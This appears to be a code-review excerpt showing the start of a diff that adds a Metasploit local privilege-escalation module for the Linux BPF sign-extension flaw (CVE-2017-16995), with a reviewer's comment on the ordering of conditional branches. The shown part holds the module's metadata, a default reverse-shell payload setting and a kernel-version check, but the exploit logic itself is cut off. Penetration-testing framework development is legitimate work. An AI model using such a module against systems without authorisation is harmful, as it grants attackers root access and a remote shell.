modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb

```diff
@@ -0,0 +1,388 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super( update_info( info, {
+        'Name'          => 'Ubuntu BPF Sign Extension Local Privilege Escalation',
+        'Description'   => %q{
+          Linux kernel prior to 4.13.0 utilize the Berkeley Packet Filter
+          which cotains a vulnerability where it may improperly perform
+          sign extentension.  This can be utilized to priv escalate,
+          this module has been tested on Ubuntu 16.04 with the 4.4.0-116
+          kernel.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        =>
+          [
+            'bleidl', # discovery
+            'vnik',   #edb
+            'h00die'  # metasploit module
+          ],
+        'Platform'      => [ 'linux' ],
+        'Arch'          => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes'  => [ 'shell', 'meterpreter' ],
+        'References'    =>
+          [
+            [ 'CVE', '2017-16995' ],
+            [ 'EDB', '44298' ],
+            [ 'URL', 'https://usn.ubuntu.com/3523-2/' ],
+            [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f' ]
+          ],
+        'Targets'       =>
+          [
+            [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
+          ],
+        'DefaultOptions' =>
+          {
+            'payload' => 'linux/x64/meterpreter/reverse_tcp',
+            'PrependFork' => true,
+           },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Nov 12 2017',
+        'Privileged'     => true
+      }
+      ))
+    register_options([
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+        OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),
+      ])
+  end
+
+  def check
+    uname = cmd_exec('uname -r')
+    if uname == '4.4.0-116-generic'
+      vprint_good('Kernel confirmed vulnerable')
+      return CheckCode::Appears
+    end
+    print_error('Kernel not vulnerable')
+    CheckCode::Safe
+  end
+
+  def exploit
+
+    def upload_and_compile(filename, file_path, file_content, compile=nil)
+      rm_f "#{file_path}"
+      if not compile.nil?
```

Comment:
Generally want to follow the `true` branch first for conditionals with both `true` and `false` branches.